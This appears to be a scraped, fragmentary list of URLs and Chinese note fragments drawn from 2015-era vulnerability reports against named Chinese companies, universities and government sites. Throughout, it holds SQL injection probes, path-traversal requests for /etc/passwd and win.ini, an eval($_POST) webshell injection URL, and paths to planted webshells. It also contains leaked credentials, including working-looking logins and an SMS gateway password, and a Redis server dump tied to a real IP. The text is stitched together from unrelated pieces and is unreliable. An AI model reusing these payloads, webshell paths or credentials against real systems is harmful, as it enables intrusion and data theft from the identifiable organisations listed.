http://**.**.**.**/news_shows.asp?id=100 http://**.**.**.**/news_shows.asp?id=100 http://**.**.**.**/gb/news_show.php?id=216&tid= http://**.**.**.**/gb/news_show.php?id=216&tid= https://**.**.**.**/mirrores/history/blob/e7beecc6f6bd94cf57356d63cafa7dcf614d9bba/application/config/email.php http://www.yunpian.com/alipay/create, https://**.**.**.**/aep/signInForget.html https://**.**.**.**/wangxuact/php-ihome/blob/c38b1160d0022d1306e566f78125ecc4408e9d35/ihome/data/data_mail.php http://**.**.**.**:8081/ https://www.91tianmi.com/forgot https://**.**.**.** http://companygit.chinacloudapp.cn/raw/~liusx/AppStore.git/master/ www.xinli001.com android:allowBackup="true"表示应用允许用户通过系统备份工具备份应用数据然后恢复,荷包应用涉及用户隐私与财产安全不应该选择开启此功能,因为这样用户在未 com.hebao.app/shared_prefs/shared_other.xml文件中,我通过 http://cps.jumei.com/ http://**.**.**.**/about/contact http://ejj.jjshipping.cn/eservices/shipsearch.jsp?startcon=CN&startPort=CNDLC&beginDate=2015-07-01&endDate=2015-07-31&endcon=CN&endPort=CNDLC http://218.108.234.212/DtvWebService/DtvWebService.asmx http://**.**.**.**/LoginAction.do http://**.**.**.**/LoginAction.do;jsessionid=E2118D0F3FA8BC4C1BDF34DC5075DE7A http://**.**.**.** http://**.**.**.**/rvwss/login.jsp http://**.**.**.**/debms/login.jsp http://**.**.**.**/debms/plan.do POST:org.apache.struts.taglib.html.TOKEN=2749fcadcd90ee1ea0e9cfa12eb44947&command=commonQuery&ksrq=&kskm=1&kscc=1&ksdd=5301102&pageSize=20 https://fxb.csair.com/fomsftc/ http://**.**.**.**:8080/cntmiServer/login.action:8080/cntmiServer/login.action http://111.203.2.34/ http://fellow.51cto.com http://gaozhao.51cto.com/deliver-get/resume-view?deliverId=319 http://gaozhao.51cto.com/deliver-get/resume-view?deliverId=319 http://gaozhao.51cto.com/deliver-get/resume-view?deliverId=319 http://gaozhao.51cto.com/deliver-get/resume-list http://yjspj.ecnu.edu.cn/login.jsp index.php/index/main.html http://mis.hongfa.com/login.aspx http://mis.hongfa.com/login.aspx http://mis.hongfa.com/login.aspx 
http://58.56.128.32:7001/neusoftam/login.jsp?j_redirect=%2Flms%2F http://58.56.128.32:7001/console/ http://58.56.128.32:7001/is/index.jsp http://103.255.93.100/ http://**.**.**.**/bugs/wooyun-2015-0150687 http://**.**.**.**/online/onabout!showList.action https://github.com/lilololi/exchange_address_download http://192.168.1.128/Pts/ViewProblem.aspx?problem=20108 http://118.191.6.52:8000/ http://58.83.196.168:8080/ebidding/login http://58.83.196.168:8080/upload5warn/cmd.jsp http://del.chinaz.com http://www.sanfu.com/ajax.php?action=select_sz_func&goods_id= http://doctor.51cto.com/service/read.sv.php?cid=298&t=1446447910 http://wap.fruitday.com:8888/ http://www.sto.cn/query_list.asp?name=%B8%A3%BD%A8%C8%AA%D6%DD%BA%BD%BF%D5%B2%BF http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29 http://www.aoratec.com http://www.aoratec.com/queryByIDProduct.action?pdId=53 http://amigo.gionee.com/ami_stat/ami_stat.php?type=mobile&val1=1&val2=list http://www.weichuanbo.com/ system:service=MainDeployer http://你的warshell地址 http://www.banban.so/data/attachment/v/bbtuploaducanneverimagine/2015091501.mp4 http://www.banban.so/data/attachment/vpreview/vyulanbbt/059.mp4 www.banban.so/player/CuSunV2set.php?FlvID=444 http://www.banban.so/player/CuSunV2set.php?FlvID= http://www.17sucai.com/pins/10990.html http://www.17sucai.com/preview/177696/2015-06-21/%E8%92%B2%E5%85%AC%E8%8B%B11/index.html http://www.17sucai.com/pins/10990.html http://timely.hiiir.com http://halo.argylehotels.com/forp/Home/Login?ReturnUrl=%2fforp%2f http://www.jinri.net/UserAccount/ProviderRegister.aspx http://mis.hongfa.com/login.aspx http://mis.hongfa.com/upload/SingleFileUpload.aspx http://mis.hongfa.com/uploadedFiles/x.aspx ftp://202.108.145.246 http://mis.hongfa.com/login.aspx http://mis.hongfa.com/admin/adminInfo.aspx http://222.73.46.131//futures/news/postcontent.aspx?id=75%20And%201=%28select%20db_name%28%29%29 http://**.**.**.**/news.php?id=78 http://**.**.**.**/news.php?id=78 http://**.**.**.**/ 
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456 www.creditchina.hk/c/media_activities_details.php?id=111657 http://www.creditchina.hk/c/media_activities_details.php?id=111657 http://www.creditchina.hk/c/media_activities_details.php?id=111657 http://219.143.202.7/ http://219.143.202.7//cim/Login.aspx?Account= http://**.**.**.**/login/userlogin http://**.**.**.**//login/userlogin http://**.**.**.**//login/userlogin http://**.**.**.**///login/userlogin http://**.**.**.**/login/userlogin http://**.**.**.**/login/userlogin http://**.**.**.**/news.php?id=14%20and%201=2 http://**.**.**.**/news.php?id=14%20and%201=1 http://jfcc.faw.com.cn/ http://www.webspherechina.net/plus/itdaren/detail.php?vid=5 www.hbapp.net可直接FTP连接导致全部分站可webshell http://www.jinmajia.com/ http://web.jinmajia.com/test/index.jsp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/点击下图中的标志链接,即网上预约服务 http://**.**.**.**:10000/taxservice/order/orderTo.action存在命令执行漏洞 http://**.**.**.**/images/dwzdsc.pdf http://**.**.**.**/ http://interface.api.haodai.com/capi/Intentuser/get_order_one http://tools.transn.com/tools/?act=plist&menu_id=4&v= http://www.lyt.cn/online/online!showProduct.action jdbc:mysql://localhost:3306/qyc_lvyoutong?useUnicode=true&characterEncoding=UTF-8 http://**.**.**.**/) http://**.**.**.**/bugs/wooyun-2015-0150977不是同一个文件/同一个操作的漏洞,而且需要的几个重要参数不一样,包括jsonstr={%22mapx%22:null,%22mapy%22:null,%22name%22:%22%22,%22path%22:%22%22,%22desc%22:%22%22,%22pId%22:null}和layerName,下面会具体说,测试时,为了这两个参数,测试了几天时间,今天终于突破了~~~ http://**.**.**.**/coremail/index.jsp?cus=1 http://**.**.**.**/tongzhi/info.htm)暴露大量负责人电话与姓名 http://**.**.**.**/news_details.php?news_id=121 http://**.**.**.**/news_details.php?news_id=121 http://**.**.**.**/news_details.php?news_id=121 
http://**.**.**.**///admin/login.asp http://www.shejiben.com http://timely.hiiir.com http://**.**.**.**/index.php?c=news&a=detail&pid=2&id=94 http://**.**.**.**/index.php?c=news&a=detail&pid=2&id=94 http://mis.hongfa.com/ http://mis.hongfa.com/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/C http://**.**.**.**/event_result.php?event_pkey=142 http://**.**.**.**/event_result.php?event_pkey=142 http://www.scient.com.cn/news/news.php?id=303 http://**.**.**.**/booksearchList.aspx?category=198&categorycode=A08 http://**.**.**.**/booksearchList.aspx?category=198&categorycode=A08 http://mis.hongfa.com http://mis.hongfa.com/1.aspx http://mis.hongfa.com/cs/select_ren.aspx?domains=&bmid=6 http://mis.hongfa.com/cs/select_ren.aspx?domains=&bmid=6 http://www.fawcar.com.cn/module/pageNews_hdzt.jsp?pageFile=pageNews_hdzt&Type=1&sonID=&Main=ztbdx&page=1&link_css=link_data http://www.fawcar.com.cn/module/pageNews_hdzt.jsp?pageFile=pageNews_hdzt&Type=1%20and%201=1&sonID=&Main=ztbdx&page=1&link_css=link_data http://www.fawcar.com.cn/module/pageNews_hdzt.jsp?pageFile=pageNews_hdzt&Type=1%20and%201=2&sonID=&Main=ztbdx&page=1&link_css=link_data http://**.**.**.**/defaultMain.aspx http://**.**.**.**/Feedback.aspx www.yidejia.com http://www.cmstop.com/ http://www.cmstop.cn/ http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250&height=100 http://119.84.78.97:8080/video http://mall.yto.net.cn/mall/searchGoods.action www.darryring.com)注册了一个账号; http://m.wzdai.com/index.php/Home/User/login password:123456 http://games.pwel.com.cn/EventsDota2/AjaxSelectSchool?school_id=1 http://www.bjsto.cn/member/index.aspx?type=login&language=cn https://www.wzdai.com/invest/ajaxLogin.html?callback=AAA http://uk7.18klk.com http://admin.chinafilmhy.com/ http://games.pwel.com.cn http://112.64.239.234/C6/ http://112.64.239.234/C6/WebResource.axd?d=1-7Gitksh2cmMXDQzYwf5Q2 http://news.ittime.com.cn/ 
http://tools.transn.com http://**.**.**.**/login!login.action存在命令执行漏洞 http://qywx.homeinns.com/rujia/a http://www.caissa.com.cn/ corp.xiaopi.com/api.php此请求中pagesize参数未做合法性校验,导致拼接sql语句的时候,混入了特殊字符,出现截断sql语句、注入恶意代码的可能。 http://**.**.**.** https://m.sino-life.com/SL_EFS/mweb/member/setting/set_mobile.html?version=1.0 http://ucoa.uc56.com:8088/Login.aspx http://ucoa.uc56.com:8088/OaWeb/PresonnelMain.aspx?typeid=26 http://cq.gionee.com/ http://shop1.vivo.com.cn,但是数据库用户权限很大,可夸12个库,有zabbix,cacti,还有shop的等等 http://shop1.vivo.com.cn/gallery-ajax_get_goods.html http://sqlmap.org http://**.**.**.**/ http://**.**.**.**/quanpingchuban_anlidaquan.html Data:userId=-1&realName=111111&userMail=1111111111@**.**.**.**&userTel=13909090099&userAge=age_b&checkMail=1&userStatus=1 http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**.**/index.do http://**.**.**.**/kwxmgl/login.jsp http://**.**.**.**/kwxmgl/jsp/nosession/zhmm/xzqhmmfs.jsp http://122.228.120.154/doc/page/login.asp http://tdcm-motor.com/doc/page/login.asp http://89.97.149.186/doc/page/login.asp http://122.228.120.154/doc/page/login.asp为一台海康威视DS-2CD3312D-I型监控摄像头的登录web地址。 urn:selfextension:psiaext-ver10-xsd urn:selfextension:psiaext-ver10-xsd http://uc.letvcloud.com/messageView/msgCenterDetailView.do?msgId=4199&msgStatus=0 http://wbgh.youxinpai.com/login/ http://wooyun.org/bugs/wooyun-2010-0149556 http://wbgh.youxinpai.com/login/check/ http://www.o2bra.com/addresses/1111/edit http://www.o2bra.com/somatotypes/1212/edit http://wap.zhaoxiaoshuo.com/paihang.php?y=2008 http://wap.zhaoxiaoshuo.com/paihang.php?y=2008 http://articles.csdn.net/1.html http://list.jr.jd.com/fundlist/1-11-112.htm http://**.**.**.**/main-uc.jsp http://**.**.**.**/main.action 
http://pub.adkmob.com/index.php?m=admin&c=index&a=login&pc_hash= http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/seeyon//logs/ctp.log http://**.**.**.**/seeyon//logs/uc.log http://zsjy.sicnu.edu.cn/news_show.aspx?id=181 http://**.**.**.**/controller/showHtml.php?id=65 http://**.**.**.**/controller/file/others/fcfaedc7b9ca474c7ecf29e91114d306.php http://**.**.**.**/revamp/tour.php?CategoryID=3&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A http://**.**.**.**/revamp/tour.php?CategoryID=3&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A http://www.o2bra.com/ http://www.o2bra.com/admin/users http://bbs.yinhu.com/data/backup.zip http://**.**.**.**/zh/shownews.php?id=2346 admin:admin http://**.**.**.**/、http://**.**.**.**:7001/defaultroot/login.jsp,两处都可以撞库,用常用用户名和弱口令123456可获得30来个账号,可泄露大量内部信息。 http://www.gdmec.net/phx/newsInfo.action?oid=1000333455&typeId=13&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A http://www.gdmec.net/phx/newsList.action?typeId=14&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93 http://www.gdmec.net/phx/newsDir.action?pid=2&ptypeName=%E7%89%A9%E8%B5%84%E9%9B%86%E5%9B%A2&typeName= http://www.gdmec.net/phx/newsInfo.action?oid=362416&pid=&typeId=14&ptypeName=&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93¤tPage=1 http://www.gdmec.net/phx/newsList.action?pid=&typeId=13&ptypeName=&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A¤tPage= http://**.**.**.**/bugs/wooyun-2010-0131862 http://**.**.**.**/html/bszn/subtypelist.jsp?subid=12&typeid=4 http://**.**.**.**/ http://www.aoratec.com http://www.aoratec.com/queryByIDProduct.action?pdId=53 http://www.aoratec.com/queryByIDDynamic.action?dnId=77 http://www.aoratec.com/queryByIDDynamic.action?dnId=77 http://**.**.**.**/Manage_ka/Manage_ka_Index.asp http://software.xmu.edu.cn/View/Search.aspx?searchword=* http://ewpay.sysu.edu.cn/ewpay/business/charge.do?action=getCustomerByRoomList http://ewpay.sysu.edu.cn/ewpay/business/charge.do?action=getCustomerAccountJournal 
http://ewpay.sysu.edu.cn/ewpay/business/charge.do?action=waitPayOrderList IP:42.159.192.145 redis_version:2.8.4 redis_git_sha1:00000000 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 process_id:1702 run_id:c75429374d58616ca6ffdf64e3db6b67d8217381 tcp_port:6379 uptime_in_seconds:3906678 lru_clock:2049429 config_file:/etc/redis/redis.conf used_memory:9020896 used_memory_human:8.60M used_memory_rss:19374080 used_memory_peak:9897136 used_memory_peak_human:9.44M used_memory_lua:33792 mem_fragmentation_ratio:2.15 mem_allocator:jemalloc-3.4.1 rdb_last_save_time:1446557612 total_connections_received:365626 total_commands_processed:746359 keyspace_hits:390548 keyspace_misses:167495 latest_fork_usec:1877 role:master repl_backlog_size:1048576 used_cpu_sys:1134.95 used_cpu_user:1070.59 used_cpu_sys_children:152.21 used_cpu_user_children:560.07 db0:keys=10269,expires=32,avg_ttl=442061302 http://**.**.**.**/about.asp?id=10 http://www.enkj.com/encloudold/member/login.aspx http://oa.meteni.com/messager/users.data http://oa.uc56.com/UCOA/WF/WorkOpt/OneWork/CH.aspx?FK_Node=%27&WorkID=51858&FK_Flow=129 http://oa.meteni.com http://oa.meteni.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/news_show.asp?id=9307 http://www.jipinweixin.com/ http://www.wx21.cn/ http://www.alipaylife.com/ http://zy.weihubao.com http://www.chinajkzs.cn/ site:weihubao.com http://global.gionee.com/ http://global.gionee.com http://upesn.com。在web版里只找到几个xss,于是下载了app看看。 http://cq.gionee.com http://cq.gionee.com/BuildLog.aspx?id=linansong_20151103135345 http://cq.gionee.com/BuildLog.aspx?id=chenrui_20151103113815 http://cq.gionee.com/BuildLog.aspx?id=zhangjb_20151103141044 http://dealer.chexun.com/API/GetDealersByBrandIdOrCompanyId.ashx?ProvinceID=3 http://business.agehui.cn/find/seed/index?type_id=1* http://business.agehui.cn/find/seed/index?type_id=1* http://business.agehui.cn/find/seed/index?type_id=1* 
http://221.179.180.158:9007/QxtSms/QxtFirewall?OperID=shfz&OperPass=shfz33&SendTime=&ValidTime=&AppendID=&DesMobile=你的手机号&Content=wooyun&ContentType=15成功收到短信息,可群发单发 http://www.originseed.com.cn/webadmin/ http://www.originseed.com.cn/template/product/miniUpload.php http://business.agehui.com/admin/login http://ht.xmyunyou.com/ https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf https://www.insomniasec.com/downloads/publications/phpinfolfi.py http://119.254.70.190/?_p=../../../../../../../../../../etc/passwd%00.jpg http://119.254.70.190/phpinfo.php http://**.**.**.**/ http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**/D:%5C/ http://**.**.**.**/D:%5C/bea/user_projects/domains/bjzl/boot.properties https://**.**.**.**/NetSPI/WebLogicPasswordDecryptor http://**.**.**.**:7001/console/ http://**.**.**.**:7001/qqq/index.jsp times:all passwordchg:yes passwordreq:yes active:yes http://**.**.**.**:7001/ezoa/reDuh.jsp http://app.a5.net//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.4008107107.com/ http://www.4008107107.com/online/index?orderNumber=1101302878&s=hdlhgwfjd# http://m.wochacha.com/antifake/leibielist/rtype/1829*/page/2 http://iphone.wochacha.com/antifake/list/reid/1007*/query/%E6%98%AD%E8%B4%B5%E7%9A%84%E9%98%B2%E4%BC%AA%E9%AA%8C%E8%AF%81 http://218.30.113.117:8000/wordpress com:8000 http://inf-dev-maybach.weibo.com:8000/info.php http://interface.benlai.com/Web.config.bak http://img105.job1001.com/upload/adminnew/2015-09-28/1443433362-EDVWB8A.txt http://ubc.ecnu.edu.cn/front/ http://ubc.ecnu.edu.cn/front/artical.php?id=461 http://ubc.ecnu.edu.cn/front/artical.php?id=461 http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/win.ini&userFileType=1 
http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/system.ini&userFileType=1 http://cargotest.ce-air.com/install/ http://video.appstar.com.cn/login.htm http://bbs.chexun.com/111.php(泄漏全站文件) http://bbs.chexun.com/1.txt(泄漏根目录文件) http://bbs.chexun.com/2.txt(PHP http://bbs.chexun.com/config/config_global.php.bk20140814 http://bbs.chexun.com/api/shop/1.php http://www.reachway.com.cn/ http://www.reachway.com.cn/reachway.rar http://**.**.**.**/double/searchlook.asp http://**.**.**.**/tcre/searchlook.asp http://**.**.**.**/xuanke/search_result.asp http://**.**.**.**//xuanke/search_shouce.asp http://**.**.**.**/neccs/login.asp http://www.zsb.ecnu.edu.cn/webapp/index.jsp http://www.zsb.ecnu.edu.cn/webapp/zcxx/zszc_info.jsp?id=15 http://www.zsb.ecnu.edu.cn/webapp/zcxx/zszc_info.jsp?id=15 http://www.scient.com.cn/ http://www.scient.com.cn/news/news.php?id=175 www.scient.com.cn/baby-center/mom-online.php?M http://www.scient.com.cn/news/news-search.php?new_keyword=%27%22%25 http://www.scient.com.cn/news/news.php?id=175 http://mobage.cn/ www.mobage.cn哦 http://wooyun.org/bugs/wooyun-2010-0122400 http://sim.qjxgold.com:28821/webTrader/loginAction!loginInit.action存在命令执行漏洞 http://**.**.**.**/about.asp?title=%D2%BD%D4%BA%BC%F2%BD%E9存在sql注入漏洞并且已经成功拿到用户名,密码 http://**.**.**.**/ http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://**.**.**.**/clf/system/clfindex.aspx http://insurance.my089.com/insurance/fileDownload?filename=../../../../../../../../etc/passwd www:x:500:500::/home/www:/bin/bash。然后突发奇想的查看下home/www/.bash_history ftp://58.240.60.178/%E9%9F%A9%E7%99%BB%E4%BC%9F/ http://**.**.**.** http://tw.faw.com.cn/ http://tw.faw.com.cn/manage/news_show.asp?id=6907 http://**.**.**.**/bugs/wooyun-2010-0107004 http://**.**.**.**/product/8.html http://**.**.**.**/product/4.html http://**.**.**.**/product/12.html 
http://**.**.**.**/user/b_OrderDetail.asp?dingdanhao=2015101012161%27 http://**.**.**.**/user/account/A_addAddress.asp?action=edit&id=5%27 http://**.**.**.**/user/account/A_addAddress.asp?action=edit&id=5%27 http://**.**.**.**/user/b_OrderDetail.asp?dingdanhao=2015101012161%27 http://**.**.**.**/ http://www.gtgw.wang/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.smartapp4u.com/androidService/cp/toEdit.h?cpId=0932 http://jfsearch.faw.com.cn http://jfsearch.faw.com.cn/showUnderpan.jsp http://www.soochowlife.net http://www.soochowlife.net/dwservices/tlzq/tljgcx/index.jsp http://www.soochowlife.net/dwservices/tlzq/tljgcx/index.jsp http://www.soochowlife.net/dwservices/tlzq/tljgcx/index.jsp http://client.wochacha.com/commodity/image?black=/*/&pkid=33947713 http://**.**.**.**/Admin/WebUpload.aspx这里没有权限限制,可以上传文件。 http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp http://math.ecnu.edu.cn/~chlu/intro_c.html?language=1&id=116 math.ecnu.edu.cn/~chlu/intro_c.html?language=1&id=116 http://**.**.**.**/zxgk.asp?lanmu=1&id=1页面存在SQL注入漏洞 http://60.ecnu.edu.cn/news/manage/news/news_js.asp?categoryid=144&cols=1&rows=4&templateid=6 http://download.ikonke.com/phpmyadmin/ http://advisor.dell-brand.com/index.php?a=search&cid=1&m=solution&sid=6&wd=e http://www.sogou.com/sogou?pid=sogou-clse-ac73001b1d44f492-0003&query=%20BNJ?%3E%20%3C&cid=qq.sogou.search&w=%20BNJ?%3E%20%3C&ie=utf-8 http://www.weloop.cn/ http://**.**.**.**/lydtsub/article.jsp?articleId=8461241 http://**.**.**.**/student/my/login http://**.**.**.**/student/my/login http://www.xgb.uestc.edu.cn/ http://www.xgb.uestc.edu.cn/mainnewsPage.php?id=110312304 http://www.xgb.uestc.edu.cn/mainnewsPage.php?id=110312304 http://zhengzhou.vanke.com/file.php?file= http://gm.ns.youzu.com/ http://www.ixingmei.com/miaosha.php?id=24 http://www.soochowlife.net http://www.soochowlife.net/yxywy/findMember.jsp 
http://www.soochowlife.net/yxywy/findMember.jsp http://www.soochowlife.net/yxywy/findMember.jsp http://sales.soochowlife.net:9002/ http://sales.soochowlife.net:9002/user/dealUserInsert.jsp http://sales.soochowlife.net:9002/user/userInsert.jsp?self=selfInfo&operFlag=1 http://m.wochacha.com/express/search?barcode=94102&express=%E5%AE%85%E6%80%A5%E9%80%81&gcsid=24eeb5d3522a79d9efc11f6042f848c3 http://m.wochacha.com/express/search?barcode=94102&express=%E5%AE%85%E6%80%A5%E9%80%81&gcsid=24eeb5d3522a79d9efc11f6042f848c3 http://218.80.224.35:8080/settlementsys/settlement_flex-debug/settlement_flex.html http://218.80.224.35:8080/app/server.jsp http://**.**.**.**:8088/Login.aspx,此处登陆无限制,可用常用用户名和常用弱口令进行撞库,获得一个有效账号:用户名lihui、密码123321,登陆后可查看全公司通讯录、全国各中心客服及网点名单、联系方式等大量内部信息。 http://cater.haidilao.com/Cater/web/telephoneLogin/gotoTelLoginPage.action https://mail.euchost.com http://60.ecnu.edu.cn/zfmx_detail.asp?id=601 http://60.190.251.204:8080/foxinn/ http://60.190.251.204:8080/FoxhisFileServer/ http://60.190.251.204:8080/zecmd/zecmd.jsp http://www.qiku.com/myec/myAddress.htm http://www.qiku.com/address/update.htm http://www.dfzq.com.cn/dfzq.rar http://oa.weifu.com.cn/j_acegi_security_check http://oa.weifu.com.cn/j_acegi_security_check http://gq.faw.com.cn/ http://gq.faw.com.cn/module/pageNews_fwcz.jsp?pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000&price1=0&price2=10000000&Key=&page=1&link_css=style6 url:http://www.pybk.com/friend.php?do=location&resideprovince=1 http://**.**.**.**/bugs/wooyun-2010-0142088 http://ac.haidilao.com/WebServices/WebServiceSSOUser.asmx/Search?usercode=0001 http://www.wise.xmu.edu.cn/imwise/Login.aspx http://218.57.146.240/cgi-bin/SVNGuanJia/usercenter.cgi http://wooyun.org/bugs/wooyun-2015-0151511 www.ittime.com.cn http://www.o2bra.com/ password:123456 http://www.super8.com.cn C7A3E5E04C02676E065E9E3828AEDAFF:FG=1 www.super8.com.cn http://oa.cowealth.com:8080/ http://gyb.xmu.edu.cn/ http://gyb.xmu.edu.cn/Public/File/5639c452c3449.php 
http://**.**.**.**/zhonggang/wokaoqu.aspx?ss=170 http://**.**.**.**/zhonggang/TeBieZhuanLan4.aspx?id=227&idl=0 http://icipms.inspur.com/ipms/jsp/login/inspur_login.jsp http://oa.weidai.com.cn/seeyon/index.jsp http://**.**.**.**/InterActive/HYB_Message.aspx?Class2_ID=0508该页面存在SQL注入漏洞 https://60.10.8.161/Login.aspx https://oneapm.kf5.com https://oneapm.kf5.com/community/question/id/3162/ http://xsgw.faw.com.cn/faw_online/admin.jsp http://zitai.vanke.com/chengji.aspx?bid=3&name=Smith&city= http://**.**.**.**/aboutus.php?cid=2 http://42.159.5.146:8080 http://englishonline.ecnu.edu.cn http://oa.99114.com/ http://oa.99114.com//messager/users.data http://www.lushanly.com/travel_car_gonglve.php?a_id=5&b_id=25&c_id=226 http://conference.lib.ecnu.edu.cn/Users.aspx?name=e&unit=e http://**.**.**.**/bugs/wooyun-2015-0141553 http://**.**.**.** http://www.xb.cgdc.com.cn/ www.xb.cgdc.com.cn http://**.**.**.**/x5/UI/portal2/process/portal/login.w http://hs.xd.com/data/wujiang/?role=42 http://hs.xd.com/data/ziyuan/?role=370 http://mobile.taikang.com/payment/bindBankList?cidnumber=1&orderAmount=1 http://mobile.taikang.com/payment/bindBankList?cidnumber=1*'%20or%20'aa'='a&orderAmount=1&orderAmount=1 https://www.xmjr.com http://**.**.**.**/personAction!loginInit.action存在命令执行漏洞 http://121.192.177.81:90/NPFC/News_De.asp?id=186 http://192.168.130.13/WEB_VMS/LEVEL15/ http://**.**.**.** http://**.**.**.**/messager/users.data http://oa.baixiangfood.com http://oa.baixiangfood.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://weixin.haidilao.com:8899/hdlwechat/wxMsg/tel.action?mendian=0 http://weixin.haidilao.com:8899/hdlwechat/wxMsg/newMoList.action http://weixin.haidilao.com:8899/hdlwechat/wxMsg/getMO.action?fromid=oKNukjjERVY--a68FPaQuMwKjzmk http://wx.qlogo.cn/mmopen/gwhELYibibFdQ8HNWnrUPnmTLLicb8ibdDx0Rj32qJzSeILyL9tjDxPLMsUHcn5J9TQ4osg99zicTRjBZH8pXMrXYHDCRI2qTYjXm/0 http://www.yzjoa.com http://www.yzjoa.com/messager/users.data 
http://XX.XX.XX.XX/portal/auth/reg_newuser_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件。 http://newoa.xbwl.cn http://newoa.xbwl.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://sms.36060.cn:8989/index.do http://**.**.**.** http://**.**.**.**/messager/users.data http://www.wandacinemas.com/search/search.jsp www.wandacinemas.com http://www.wandacinemas.com http://www.super8.com.cn C7A3E5E04C02676E065E9E3828AEDAFF:FG=1 www.super8.com.cn http://gm.uuzu.com/ http://ac.haidilao.com/WS/WebService.asmx/GetFile http://i.xilu.com/index.php?p=space_viewUserInfo\&ownerid=6531955 http://sqlmap.org http://www.51piao.com/Ticket/TicketList.aspx http://www.51piao.com/Ticket/TicketList.aspx http://mapi.mama.cn/v5_3_0/api/mamaquan/mmq_new_reply.php http://**.**.**.**/HotelList.php?pid=103 http://**.**.**.**/default.aspx河南省,陕西省云平台 http://**.**.**.**/login.aspx http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1* http://m.100tal.com:80/ http://XX.XX.XX.XX/wcm/console/auth/reg_newuser_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件。 http://119.254.70.114/LianJia/?m=ProductList&a=seachProList&orderid=3 http://119.254.70.114/LianJia/xiaoma.php http://oa.qk365.com/ http://www.super8.com.cn C7A3E5E04C02676E065E9E3828AEDAFF:FG=1 www.super8.com.cn http://gte.cnoocgas.com:8080/portal http://gte.cnoocgas.com:8080/portal/news/new.jsp?id=0000111035 http://fz.evergrande.com/msg.php http://iphone.wochacha.com/ga.php?guid=ON&utmac=MO-1858309-10&utmn=2016505729&utmp=/help%3Fgcsid%3D15cb98e8023c6a845f9999b00e9ed976&utmr=http://iphone.wochacha.com/ https://test.1jiajie.com/system/site/login/ https://testboss.1jiajie.com/system/site/login http://**.**.**.**/BPMSite/login.aspx http://gte.cnoocgas.com:8080/portal/ http://gte.cnoocgas.com:8080/portal/webwarranty/lead_view.jsp?type=l&wid=0000117294 http://zt.a963.com/a963/design/zbdetail.php?id=170 http://www.2177s.com/android/Service.aspx?nType=view&direct=1&pageno=1&srv=recommend 
http://www.2177s.com/android/Service.aspx?toUser=0&srv=getwebMsgDetail&UserKey=BD64766776B32740B736F28276CC6F0A http://www.2177s.com/android/Service.aspx?userid=40780557&srv=userinfo http://**.**.**.**/ http://**.**.**.**/admincp.php?mod=login http://**.**.**.**/admincp.php?mod=down&path=data/bakup/&file=../../index.php http://**.**.**.**/admincp.php?mod=down&path=data/bakup/&file=../../admincp.php http://121.192.191.146/lims/ http://imcs.ecnu.edu.cn/MAIN/Aboutus.asp?Title=%C3%FB%D3%FE%CB%F9%B3%A4 http://gte.cnoocgas.com:8080/portal http://gte.cnoocgas.com:8080/portal/webfile/out_fw_view.jsp?fwid=FNzaNBUFDaXfTS6nQbkaEjz9qz&title=%E5%85%B3%E4%BA%8E%E5%8F%AC%E5%BC%80%E6%B0%94%E7%94%B5%E9%9B%86%E5%9B%A2%E4%BA%A4%E9%80%9A%E6%96%B0%E8%83%BD%E6%BA%90%E4%BA%8B%E4%B8%9A%E9%83%A82015%E5%B9%B4%E5%B9%B4%E4%B8%AD%E5%B7%A5%E4%BD%9C%E4%BC%9A%E8%AE%AE%E7%9A%84%E9%A2%84%E9%80%9A%E7%9F%A5 http://jiuye.jikexueyuan.com/assistant/apply admin.php/system/updateadmin.html?id=136252 http://jsjy1.dec.ecnu.edu.cn/web/remark/list.asp?id=11&Pageno=1&websortid=7 http://ac.haidilao.com:90/ http://ac.haidilao.com:89/ http://ac.haidilao.com:91/ http://ac.haidilao.com:91/WebServices/WebServiceSSOUser.asmx/GetUserList 